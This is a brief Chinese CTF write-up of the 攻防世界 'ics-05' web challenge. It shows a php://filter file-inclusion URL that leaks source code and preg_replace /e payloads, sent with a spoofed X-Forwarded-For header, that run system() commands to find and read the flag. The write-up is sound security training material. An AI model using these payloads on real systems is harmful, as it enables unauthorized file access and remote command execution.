攻防世界 ics-05

1.进入网址,后台工具扫描,未发现可以利用的网址;各处点击,会发现只有一个页面可以点击,其他地方都没有反应

2.查看源码试试 ,发现page=inde,可以点击,联想到文件包含漏洞(URL中出现path、dir、file、page、archive、p、eng等这些字符,就要注意啦~)

  1. 于是想到利用php伪协议,查看源码,发现一串字符,“=”结尾,断定为base64编码,在线转码工具可以进行转码,获得源码
?page=php://filter/read=convert.base64-encode/resource=index.php

4.利用pre_replace漏洞,用burpsuite进行抓包,根据关键部分代码提示,增加X-Forwarded-For:127.0.0.1,构造payload得到./s3chahahaDir/flag

/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=123

5.把…/s3chahahaDir/flag代入payload,即可得到flag

index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123


最后,涉及到的关键知识点学习,小小总结一下叭:pre_replace漏洞 、文件包含漏洞、PHP伪协议~

攻防世界 ics-05相关推荐

  1. 【愚公系列】2023年05月 攻防世界-Web(lottery)

    文章目录 前言 一.lottery 1.题目 2.答题 前言 dirsearch是一个用于Web服务器的爬虫工具,它可以快速地扫描网站的目录,并找出隐藏的文件和目录.dirsearch可以检测出许多常 ...

  2. 攻防世界MISC刷题1-50

    目录 1.ext3 2.base64stego 3.功夫再高也怕菜刀 4.easycap 5.reverseMe 6.Hear-with-your-Eyes 7.What-is-this 8.norm ...

  3. 攻防世界-PWN-new_easypwn

    攻防世界-PWN-new_easypwn 检查保护机制 healer@healer-virtual-machine:~/Desktop/attachments$ checksec hello [*] ...

  4. 攻防世界 Pwn 进阶 第二页

    00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手 攻防 ...

  5. 攻防世界 Pwn 进阶 第一页

    00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...

  6. 攻防世界--Misc文件类型

    Misc文件类型 文件下载后发现一大字符串 一开始放进winhex里面各种对照文件头 修改后缀名 但发现都没有效果 后来看了wp才知道一开始拿到的是一串密文(被题目误导了) 需要进行解码 放入winh ...

  7. 攻防世界 base64stego

    title: 攻防世界 base64stego date: 2021年8月16日 15点22分 tags: 攻防世界 categories: 攻防世界 这道题也是很狡猾啊,没接触过的话,任凭怎么想,可 ...

  8. 攻防世界-MISC:base64stego

    这是攻防世界新手练习区的第十一题,题目如下: 点击下载附件一,发现是一个压缩包,点击解压,发现是需要密码才能解密 先用010editor打开这个压缩包,这里需要知道zip压缩包的组成部分,包括压缩源文 ...

  9. 攻防世界web进阶区Web_python_block_chain详解

    攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...

  10. web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)

    web做题笔记 文章目录 web做题笔记 buuoj easy_tornado 随便注 warmup easysql 高明的黑客 jarvisoj re? flag在管理员手上 api调用 chopp ...

最新文章

  1. 【响应式Web前端设计】CSS3 :nth-of-type() 选择器
  2. PAT1004 成绩排名【vector sort排序、string的使用】
  3. fat32 linux 打包工具_11款最棒的Linux数据恢复工具发布啦!
  4. docker mysql主从_使用docker 实现MySQL主从同步/读写分离
  5. 苹果cms V8模板 价值200RMB时尚大气功能超强模板
  6. asp.net 截屏 截取web页面 源代码
  7. 分数加减法 http://acm.nyist.net/JudgeOnline/problem.php?pid=111
  8. 智能会议系统(33)---WebRTC学习之四:最简单的语音聊天
  9. 成为java架构师需要几年,详细说明
  10. Objective-C 函数
  11. sparksql处理mysql_Spark记录-SparkSQL远程操作MySQL和ORACLE
  12. 有了域名空间服务器怎么做网站,有了域名和空间怎么建网站?
  13. 车联网智能终端GB/T 32960国标协议规范 、国标新能源车联网终端GB/T32960标准T-BOX应用
  14. Java多线程并发面试
  15. html制作唯品会登陆页面,login.html
  16. 错误“a label can only be part of a statement and a declaration is not a statement”解决方法
  17. Firefly ROC-RK3588S-PC板卡详细介绍
  18. u2硬盘测试软件,Buffalo HD-PET320U2移动硬盘检测报告
  19. 关于我如何阅读源码这件事...
  20. body中的相关标签

热门文章

  1. 使用Python仿真波的叠加
  2. 关于电视剧评价指标的描述性分析
  3. 求95859回文数c语言程序,csdn 回文数
  4. PLC_自动化控制系统_1_简说自动化控制系统
  5. elasticsearch 出现all shards failed异常?
  6. 电池SOC仿真系列-基于GA-BP神经网络的电池SOC估算方法
  7. ​​​​尚硅谷—尚医通—前台用户系统—预约挂号—预约下单功能实现(155-160)
  8. Oracle前期准备
  9. 中国oracle ace名单
  10. 使用R进行文本数据挖掘